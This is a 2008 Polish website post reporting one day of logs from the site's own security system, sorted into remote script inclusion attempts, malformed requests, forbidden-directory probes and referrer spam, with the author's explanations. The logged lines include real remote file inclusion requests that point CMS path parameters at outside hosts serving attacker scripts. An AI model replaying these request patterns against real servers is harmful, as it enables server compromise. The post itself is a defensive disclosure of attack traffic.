ARCHIWUM NOWOŚCI

Raport systemu zabezpieczeń

wtorek, 19 lutego 2008

Dla jednych ten tekst będzie wyłącznie śmieciem, dla innych ciekawą informacją, a dla niektórych być może przestrogą przed próbami niewłaściwego wykorzystywania strony poprzez fałszowanie ruchu bądź próby ataku na serwis. Poniżej przedstawiam raport działania scrollmatycznego systemu zabezpieczeń - scrollmatycznie sporządzany spis wszystkich niepożądanych sytuacji, które miały miejsce w przeciągu zaledwie jednej doby w dniu 18.02. Nie polecam sprawdzania podanych wywołań! Zostały one przedstawione wyłącznie w celach informacyjnych, a próba ich wywołania może nieść zagrożenie dla użytkownika.

Próby wywołania obcego skryptu
Tego typu ataki mają na celu próbę wywołania skryptu znajdującego się na obcym serwerze lub niezabezpieczonego kodu lokalnego celem bądź zbadania zabezpieczeń serwera, bądź wykradzenia/uszkodzenia danych znajdujących się na nim. Opierają się najczęściej o luki w popularnych systemach CMS bądź w samej konfiguracji serwera.
W ciągu doby zanotowano 26 takich prób ataku:

[18-lut-2008 00:00:07] [67.18.111.18] [/impex/ImpExData.php?systempath=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt??]
[18-lut-2008 00:35:05] [82.55.110.159] [/galerie.phphttp://jinuisryan1918pe.chat.ru/images/mybabyboy] 
[18-lut-2008 00:57:17] [222.121.59.199] [/galerie.phphttp://jinuisryan1918pe.chat.ru/images/mybabyboy] 
[18-lut-2008 00:57:35] [222.121.59.199] [/porady.phphttp://jinuisryan1918pe.chat.ru/images/mybabyboy] 
[18-lut-2008 01:10:50] [67.18.111.18] [//update/update5.php?lang=http://www.beautybylaura.co.uk/zencart/includes/mambo??] 
[18-lut-2008 05:01:41] [207.58.166.122] [/index.php?option=com_content&task=&id=&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do???]
[18-lut-2008 06:19:56] [87.249.105.35] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 06:19:56] [87.249.105.35] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 06:19:56] [87.249.105.35] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 07:36:47] [75.125.104.212] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 07:36:48] [75.125.104.212] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 07:36:48] [75.125.104.212] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 07:52:49] [218.189.208.72] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 07:52:50] [218.189.208.72] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 07:52:53] [218.189.208.72] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 10:15:25] [202.38.152.250] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 10:15:25] [202.38.152.250] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 10:15:26] [202.38.152.250] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 12:16:51] [67.159.30.77] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 12:16:51] [67.159.30.77] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 12:16:52] [67.159.30.77] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 13:51:07] [200.49.148.60] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 13:51:08] [200.49.148.60] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 13:51:10] [200.49.148.60] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 21:14:48] [207.58.166.122] [/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do???]
[18-lut-2008 23:35:55] [72.29.89.97] [/sources/functions.php?root_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do???]

Nieznane cele
Tego typu wyjątki najczęściej powstają wskutek błędów ludzkich lub niewłaściwej pracy robotów sieciowych, jednakże mogą być także wykorzystywane do ataków. W ciągu badanej doby zanotowano 6 prób ataku tej kategorii:

[18-lut-2008 05:27:53] [Ref: https://forum.dzyszla.pl/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D] [80.227.1.100] [/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 05:27:55] [Ref: https://forum.dzyszla.pl/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D] [195.229.242.154] [/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 05:28:17] [Ref: https://forum.dzyszla.pl/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D] [80.227.1.101] [/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 05:28:20] [Ref: https://forum.dzyszla.pl/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D] [221.232.159.112] [/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 11:37:36] [Ref: http://www.elektroda.pl/rtvforum/topic420395.html] [192.138.116.231] [/notified-VCNstrict?aHR0cDovL3d3dy5kenlzemxhLmFwbHVzLnBsLw==]
[18-lut-2008 11:37:36] [Ref: http://www.elektroda.pl/rtvforum/topic420395.html] [192.138.116.231] [/verify-VCNstrict?aHR0cDovL3d3dy5kenlzemxhLmFwbHVzLnBsLw==]

Niewłaściwe parametry
Ataki tego typu najczęściej wykorzystywane są do inwazji na serwery bazodanowe. Bazują na założeniu, że przekazywane do strony parametry nie są weryfikowane, lecz przekazywane dalszej obróbce (np. stają się częścią zapytania SQL). Miniona doba była pod tym względem wyjątkowo spokojna, gdyż zanotowano zaledwie jedną próbę takiego ataku:

[18-lut-2008 07:19:54] [66.249.65.197] [/userslist.html?sort=nam] forum-userlist sort=nam

Odwołanie do obszarów zabronionych
Tego typu błędy najczęściej generują roboty, które błędnie starają się interpretować skrypty javy, bądź próbują listować zabronione znane katalogi. Najczęściej są to sytuacje kończące się błędem serwera 403 (brak dostępu). Takich przypadków w przeciągu minionej doby zanotowano 7:

[18-lut-2008 05:29:05] [Ref: https://forum.dzyszla.pl/] [87.118.70.17] [/gfx//]
[18-lut-2008 06:04:16] [Ref: https://forum.dzyszla.pl/] [81.177.26.20] [/gfx//]
[18-lut-2008 10:49:15] [Ref: https://forum.dzyszla.pl/] [81.177.3.14] [/gfx//]
[18-lut-2008 13:01:54] [Ref: https://forum.dzyszla.pl/] [65.191.126.97] [/gfx//]
[18-lut-2008 15:58:32] [Ref: https://forum.dzyszla.pl/] [87.118.70.8] [/gfx//]
[18-lut-2008 19:37:33] [Ref: https://forum.dzyszla.pl/] [87.11.16.228] [/gfx//]
[18-lut-2008 21:10:14] [Ref: https://forum.dzyszla.pl/] [24.9.80.52] [/gfx//]

Spam referencyjny
Ten przypadek dotyczy podawania fałszywego adresu strony, z jakiej jakoby miało nastąpić wejście do serwisu. W rzeczywiści na podanej stronie nie znajduje się żaden link prowadzący do atakowanego serwisu, stąd takie przypadki traktuje się jako atak. Mają one na celu głównie atak na systemy statystyk, które wyświetlają listę stron, na których znajdują się linki do danego serwisu oraz zliczają liczbę kliknięć w te linki. Jest to najtrudniejsza do wychwycenia kategoria ataku, gdyż adresy stron bardzo często ulegają zmianie, co pociąga za sobą konieczność uaktualniania bazy. Stąd na tej stronie często zastosowano wieloznaczeniowe reguły (np. odrzucane są wszelkie adresy referujące z domeny .jed.pl) mogą jednak doprowadzić do fałszywego alarmu. Tego typu fałszywych danych w ciągu doby zanotowano 4:

[18-lut-2008 02:55:13] [Ref: http://www.newrxforum06.kokoom.com] [62.85.45.65] [/topic209-11.html]
[18-lut-2008 19:02:41] [Ref: http://sexvidworld.info] [89.36.54.217] [/topic209.html]
[18-lut-2008 19:36:19] [Ref: http://easypornsite.info] [68.80.154.230] [/topic209.html]
[18-lut-2008 23:38:32] [Ref: http://www.newrxforum06.kokoom.com] [62.85.45.65] [/topic209.html]

Złośliwe lub nierzeczywiste działanie odwiedzającego, takie przypadki najczęściej związane są z próbą fałszowania ocen zasobu na stronie (tekstu, zdjęcia itp.) poprzez albo próbę wielokrotnego oddawania głosu, albo poprzez zbyt dużą liczbę głosów oddawaną w krótkim czasie. Na szczęście już wstępnie opracowane technologie zapobiegają takim działaniom, stąd nie zanotowano ani jednego ataku tej klasy, który by musiał być wychwytywany na drugim stopniu zabezpieczeń wywoływanym jedynie poprzez ręczne preparowanie wysyłanych do strony informacji.

Podsumowując, jak widać opracowany system zabezpieczeń zapisuje skrzętnie wszelkie podejrzane przypadki, logując przy tym IP maszyny, która dopuściła się wywołania niepożądanej sytuacji. Dlatego dla adresów, z których wyjątkowo często następują ataki, dostęp do strony zostaje całkowicie odcięty. Warto zaznaczyć, że najczęściej wystąpienie opisanego wyjątku kończy się natychmiastowym przerwaniem wczytywania strony w calu ochrony transferu oraz obciążenia serwera. Ponadto rejestrowane są także wszelkie zdarzenia powodujące powstanie błędów 400, 401, 402, 403, 404 oraz innych, które nie zostały przedstawione. Dodatkowo system w celach informacyjnych zapisuje wszystkie przypadki:

Ocenienia zasobu na stronie (porady, zdjęcia, pliki, teksty itp.),
Wysyłania wiadomości na e-mail, w tym zapisy na listę subskrypcji,
Błędy w działaniu strony, skryptów lub połączenia z serwerem.

Informacje te poddane naocznej analizie pozwalają na dalsze wyłapywanie wszelkich nieprawidłowości lub złośliwego działania użytkowników.

Okres

Komentarze (0)

Trwa ładowanie komentarzy...

ARCHIWUM NOWOŚCI

Okres

Komentarze (0)

REKLAMA

MENU

NA SKRÓTY

MYŚL DNIA

ANKIETA

REKLAMA

	Strona istnieje od 25.01.2001 Ta strona używa plików Cookie. Korzystając z niej wyrażasz zgodę na przetwarzanie danych a zakresie podanym w Polityce Prywatności.